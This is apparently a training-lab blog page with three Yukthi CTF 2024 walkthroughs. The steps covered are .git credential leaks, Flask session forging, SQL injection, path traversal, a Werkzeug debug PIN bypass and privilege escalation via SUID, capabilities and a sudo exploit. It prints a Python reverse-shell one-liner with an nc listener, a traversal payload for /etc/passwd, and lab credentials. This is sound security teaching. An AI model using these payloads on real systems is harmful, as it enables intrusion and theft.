Introduction In the finals of the Yukthi CTF 2024, I, Meena, a cybercrime investigator from Chennai, undertook an intense "Cyber Investigation" challenge. This journey offered hands-on experience in digital forensics, emphasizing the importance of securing sensitive information, identifying breaches, and managing server intrusions within a company’s infrastructure. Key Takeaways for Aspiring IT Students This article highlights crucial techniques beneficial for students aiming to build their expertise in Selfmade Ninja Lab cloud lab training for aspiring IT students: Analyzing exposed .git repositories to locate sensitive data. Strategies to obtain privileged web access using secret keys. Executing SQL injection to retrieve critical information. Leveraging setuid permissions for root access escalation on a Linux server. Getting Started Create an Account: To participate in this challenge, start by signing up at Selfmade Ninja Labs(Click here). If you don’t already have an account, create one using this signup link (Click here) Activate Wireguard: After creating your account, activate Wireguard VPN to securely connect to the lab environment. Access the Machine Labs: Navigate to the Machine Labs section from the dashboard on Selfmade Ninja Labs(Click here) On the left navbar, click My Lab > Challenge Lab. Browse through the list of challenges and locate the Fruity challenge. Start the Challenge: On the top-right, select Deploy Lab and click Start Mission. ou’ll receive an IP address. Forward this IP in your VS Code or terminal to access the environment and begin the challenge. Challenge 1: Data Breach Story Tasked with investigating a data leak at a company using a single dashboard to manage product issues reported by customers, I had to find the source of these leaks and secure a report from the /home directory. Challenge Flow Initial Reconnaissance: The first step was to perform a network scan to identify open ports and potential entry points. The scan revealed two open ports: SSH (port 22) and HTTP (port 80), indicating the presence of an accessible website and a possible way to gain shell access. Website Analysis: Upon visiting the website, I conducted a thorough examination of its structure and endpoints. During this process, I discovered a .git endpoint, which could potentially expose sensitive version control information. .git Repository Exploration: Exploring the .git repository revealed critical details, including usernames, passwords, and a secret key. This involved cloning the repository and inspecting the commit history and file contents for exposed credentials and configuration files. Repository: https://git.selfmade.ninja/Jawahar.s/old-project From the repository, in the branch prod, I retrieved an access-list.json file filled with user credentials and discovered a secretkey. Gaining Dashboard Access: Using the credentials jamie and jamieKey@1415, I logged into the dashboard. In the dashboard, I saw the report page, but I couldn’t access it because it was restricted to admin users only. Knowing that the site was running on Flask and having obtained the secret key from the master branch, I hypothesized that the same secret key might be used for the session management. I started crafting the payload. Admin Session Forging: With the secret key and a script from https://git.selfmade.ninja/Jawahar.s/flask-sess-forge, I forged an admin session cookie. I pasted this cookie into the cookies tab of my browser, which granted me admin access. This allowed me to access the admin-only report page. Executing SQL Injection: After entering the report page, I noticed a filter bar for products. I attempted a SQLite injection here. By utilizing an SQL union query, I accessed the database and extracted all user details. I obtained all user data from the database, including some active admin users. Specifically, I retrieved cater’s username and password, caterKey@hy2k2, and accessed the server via SSH to find the report in /home/report. Challenge 2: Server Intrusion Story Following the data breach investigation, a new concern arose regarding a suspicious file on the server, hinting at a more severe security breach involving leaked income reports. Challenge Flow Finding SUID Binaries: The first step was to search for binaries with setuid permissions. Setuid binaries are executable files that run with the permissions of the file owner, which can sometimes be exploited to gain elevated privileges. I used the following command to find all setuid binaries on the system: find / -perm -4000 -type f 2>/dev/null This command searches the entire filesystem (/), looking for files with the setuid permission (-4000) and suppressing error messages (2>/dev/null). The search revealed several binaries, including an unusual one. Identifying Anomalous Binary: Among the setuid binaries, I identified an anomalous binary located at /var/anomalous. Its presence and permissions stood out as unusual, making it a prime target for further investigation. Executing the Anomalous Binary: I executed the ./anomalous binary to understand its functionality. The binary launched a command-line application that prompted me to select from a list of options: cater@secure_byte:/var$ ./anomalous Welcome to our command-line application! Please select a command (type 'options' to view available commands): > options Available options: 1. init – Initialize the system 2. welcome – Show the welcome message 3. options – Show this options menu 4. start – Begin the application > init Initializing system… System initialized successfully! The provided commands didn’t reveal anything useful, so I decided to dig deeper into the binary to uncover any hidden functionalities. Analyzing the Binary with Strings: To explore the binary further, I used the strings command, which extracts printable strings from a binary file. This is a useful technique for discovering hidden commands or embedded information within an executable. strings anomalous Running this command on the anomalous binary revealed a list of strings, including one that caught my attention: readfile. Discovering the Hidden Command: The readfile string was not listed in the application’s available commands, making it a hidden or undocumented command. This discovery suggested that the binary had additional, hidden functionality that could be exploited. Executing the Hidden Command: I ran the ./anomalous binary again and entered the readfile command to test its effect: cater@secure_byte:/var$ ./anomalous Welcome to our command-line application! Please select a command (type 'options' to view available commands): > readfile Contents of /root/hiddenGem.77: 1a441c9439402c7033e5b915e1aeffa3.ninja File read successfully! > The hidden …

Cyber Investigation – Yukthi CTF 2024 Finals Read More »

Introduction to Operation Warehouse Operation Warehouse is a fascinating web-based challenge featured in the Yukthi CTF 2024 prelims. This challenge immerses participants in a simulated underground network and offers an in-depth, step-by-step cyber puzzle. By testing your cybersecurity skills, this challenge supports your journey in mastering ethical hacking, all while gaining hands-on experience in Selfmade Ninja Lab cloud lab training for aspiring IT students. Journey Through the Challenge Starting with the basics, participants first exploit a Flask debug console vulnerability combined with a path traversal bug. These initial vulnerabilities provide a pathway to deeper insights, leading to crucial access points within the system. Successfully obtaining the Werkzeug debugger pin allows participants to launch a reverse shell via Python, marking a major milestone in the challenge. Delving Deeper The second phase of Operation Warehouse introduces a separate machine where participants unlock root access using Python’s setcap capabilities. This stage tests advanced real-world cyber-attack simulations, requiring skills in privilege escalation and effective navigation of complex system layers. Getting Started: Accessing the Labs Visit the Selfmade Ninja Labs and log in to your account (Click here) Don’t have an account? No worries! Create one here. Activate WireGuard Follow the provided setup instructions to activate the WireGuard VPN. Access the Machine Labs Dashboard Go to Selfmade Ninja Labs and click Machine Labs to open the dashboard. On the left sidebar, navigate to My Lab dropdown and select Challenge Lab. Find and Launch the Challenge Browse the challenge page for Send the Alien Back Home and click the challenge button. In the top-right corner, click Deploy Lab and then click Start Mission. Note the IP address assigned to your challenge. Use this IP address to configure port forwarding in your VS Code setup. Skills Learned By participating in Operation Warehouse, you develop essential cybersecurity skills including: Reconnaissance and exploitation strategies Privilege escalation and system security bypass Network reconnaissance and web pentesting Enumeration 1. Initial Reconnaissance Start by conducting a port scan using nmap to identify active ports. The scan reveals that port 7777 is open, suggesting that a web service might be running on that port. nmap -p- ipaddress This scan shows that port 7777 is actively accepting connections, which is typically indicative of a web service. 2. Exploring Port 7777 Port forwarding to port 7777 revealed a website running on the server. Analyzing the webpage's source code uncovers an interesting endpoint: readfile?file=about.html. Altering this endpoint to readfile?file=….//…// exposes a Flask error message, confirming the server's framework. Alternatively, you can use Wappalyzer to quickly detect the technologies used on the website, confirming that Flask is running on the server. Accessing the /console endpoint reveals the debug console pin on the production server. The presence of this debug feature results from the application being configured with DEBUG=True in its production settings. This configuration should be disabled in a live environment to prevent security vulnerabilities. 3. Exploiting Path Traversal Next, scrutinize the readfile endpoint, which serves files directly. Notably, the URL <a href="http://127.0.0.1:7777/readfile?file=app.py&#x60">http://127.0.0.1:7777/readfile?file=app.py&#x60</a>; indicates a susceptibility to a path traversal attack. The application's handling of path traversal is peculiar: initially, any "../" sequences are replaced with an empty string, and then subsequent "../"` sequences are converted to a dot. Using this knowledge, craft the following URL to exploit the vulnerability and attempt to read system files like /etc/passwd: http://127.0.0.1:7777/readfile?file=….//…//…//…//…//…//…//…//etc/passwd To effectively exploit the vulnerabilities of the Flask debugger, specific detailed information about the application environment is needed. Here’s a breakdown of the data required and how it can be used to retrieve the console pin using a script designed for bypassing the Werkzeug debug console. Required Data for Console Pin Exploitation To exploit the console pin, you need specific details about the Flask application environment, which are crucial for the script to generate the correct console pin. The necessary details include: Username: The username under which the Flask application is running. Modname: The name of the main module of the Flask application. Machine ID: A unique identifier for the host machine which can sometimes be extracted from files like /etc/machine-id. MAC Address: The MAC address of the network interface, often obtainable via system files or network configuration commands. Obtaining the Required Details These details can typically be found by examining files within the application environment or by exploiting other vulnerabilities, such as the path traversal flaw discovered. By gathering this information, you can effectively use the script to bypass the debug console's security. Using the Bypass Script For additional information and the script, check out the GitHub repository. https://github.com/wdahlenburg/werkzeug-debug-console-bypass Using this script correctly with the appropriate data will allow you to bypass the Werkzeug debug console's security and gain access. This can be crucial in a penetration testing scenario or a CTF challenge. OR 4. Obtaining Console Pin using automation script Further exploitation of the path traversal vulnerability allows for obtaining the console pin. A script automates fetching the necessary data such as Flask app module names and machine identifiers: https://git.selfmade.ninja/Jawahar.s/werkpin/-/blob/master/werkpindebug.py This script, when executed, provides the debug console pin 5. Exploiting the Debug Console With the debug pin in hand, you can now target a reverse shell. Set up a listener using nc: nc -lnvp 9001 Executing the following Python script then allowed a reverse shell connection to be established: import os;os.popen(“””python3 -c ‘import socket,subprocess,os,tty,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.30.0.73”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/bash”)'”””) The reverse shell provided direct command line access to the server. 6. Victory Using the obtained shell access, navigation to /home/jamie was accomplished to retrieve the first flag. Second Challenge: Escalating Privileges 1. Identifying Python Capability To escalate privileges, start by identifying if any system binaries have special capabilities that can be exploited. Use the getcap command to list all capabilities granted to executables. Command: getcap -r / 2> /dev/null This command recursively searches the root directory for all files with any set capabilities. It redirects errors to null to clean up the output. Finding: The command shows that Python 3.8 has been granted special capabilities, making it a potential vector for privilege escalation. 2.Escalating Privileges Using Python Once …

Operation Warehouse: Yukthi CTF 2024 Prelims – Cyber Investigation Challenge Read More »

Introduction Welcome to Case Unlocked, a featured challenge in the Yukthi CTF 2024 prelims, designed to immerse participants in an engaging journey of digital exploration and security testing. This challenge reflects the innovative training offered by Selfmade Ninja Lab cloud lab training for aspiring IT students, where participants delve into uncovering vulnerabilities, gathering sensitive information, and mastering web exploitation techniques. By participating in this challenge, students develop essential cybersecurity skills, including identifying and exploiting web vulnerabilities, analyzing hidden credentials, and escalating privileges on Linux systems. It’s a hands-on approach that builds practical expertise in ethical hacking and web security. Getting Started To begin the challenge: Visit Selfmade Ninja Labs and sign in with your account. If you don’t have an account, create one using this link: Selfmade Ninja GitLab Sign In (click here) Activate WireGuard as prompted. Go back to Selfmade Ninja Labs and click on the Machine Labs section in your dashboard. In the left-side navigation bar, expand the My Labs dropdown and select Challenge Labs. Browse through the available challenges and search for Case Unlocked. Once you locate the challenge, click the Challenge button. At the top-right corner, select Deploy the Lab and then click Start Mission. You will receive an IP address for the deployed lab environment. Use VS Code to port forward this IP address and begin the challenge. Skills Learned Effective methods for exploring and exploiting web endpoints Techniques for uncovering hidden or obscured login credentials Strategies for privilege escalation on Linux systems Enumeration 1. Initial Reconnaissance The first step involved scanning the network for open ports. Using the command nmap -p- 10.11.3.92, we performed a comprehensive scan. nmap -p- 10.11.3.92 This preliminary scan is essential because it helps to identify potential entry points on the target machine. Specifically, it reveals which ports are listening and may be vulnerable to further exploitation. Thus, this scan provides crucial information for planning subsequent steps in the exploitation process. 2. Discovering Port 80 The scan results showed that port 80 was open, which indicated that a web service was running. By accessing this web service through a browser, you obtained a pivotal clue for further actions. Consequently, this clue guided the next steps in your exploration and exploitation process. Upon accessing the webpage, I encountered an interactive game embedded within the site. This discovery provided an intriguing element to explore further. Therefore, it became a focal point for deeper investigation and analysis. 3. Endpoint Exploration Utilizing the Nikto tool, a comprehensive web server scanner that checks for dangerous files, outdated server software, and other problems, I was able to discover some interesting endpoints: nikto -h http://localhost:34829 These included admin login and .git pages. Navigating to the admin page redirected to a login page, but without known credentials: The discovery of a publicly accessible .git directory was crucial. It is a common security oversight to leave git directories accessible on production servers, which can expose sensitive information. Using GitTools (https://github.com/internetwache/GitTools), I cloned the repository found on the server, allowing access to the development history and potentially sensitive data. 4. Unearthing Credentials https://github.com/internetwache/GitTools cd GitTools After cloning the git repository, the command git log | grep "commit" | cut -d " " -f2 | xargs git show was used to extract and decode commits. This command sequence is useful for examining commit histories to find potentially leaked sensitive information. git log | grep "commit" | cut -d " " -f2 | xargs git show The credentials were found encoded in Base64 within the commit messages: mail=tetris@gmail.com: passwd=VDdpM19pM181ZXJlY3RfN2E1NXcwcmQ=, which decodes to T7i3_i3_5erect_7a55w0rd. username= testris@gmail.com password=T7i3_i3_5erect_7a55w0rd 5. Securing the Flag With the decoded credentials in hand, I used them to log in through the login.html page. Upon successful authentication, It was redirected to the /secret.php page, where the first flag was revealed. Challenge 2: Loophole Discovery After completing the initial challenge, I resumed with another round of port scanning to uncover further points of attack. This scan highlighted an active SSH service on the target. 1. Further Reconnaissance A subsequent port scan revealed that SSH (port 22) was open, providing an ideal vector for utilizing the credentials discovered earlier. This allowed for direct access to the system’s shell. ssh tetris@IPaddress 2. Identifying Vulnerable Sudo Version Once inside the shell, I employed various strategies to escalate privileges. Noticing the sudo version was 1.8.21, an older and known exploitable version, I identified a potential avenue for attack. The presence of password feedback (asterisks when typing the password) confirmed that pwfeedback was enabled, a feature vulnerable to specific exploits. sudo –version Sudo Version Check: Research on Google led me to an exploit in the Exploit Database that could leverage this vulnerability (CVE-2019-18634). Exploit Repository: CVE-2019-18634 3. Gaining Root Access I cloned the exploit script from GitHub: git clone https://github.com/Plazmaz/CVE-2019-18634/ cd CVE-2019-18634 /self-contained.sh Running the ./self-contained.sh script from the cloned repository exploited the pwfeedback buffer overflow vulnerability, successfully granting root access. This allowed me to locate a critical document inside /root/locker/. Conclusion The Case Unlocked challenge is a testament to the comprehensive and practical learning approach offered by Selfmade Ninja Lab cloud lab training for aspiring IT students. By engaging with real-world scenarios, participants not only enhance their technical skills but also build the confidence to tackle complex cybersecurity challenges in the field. Let the mission begin—empower your skills with Selfmade Ninja Labs!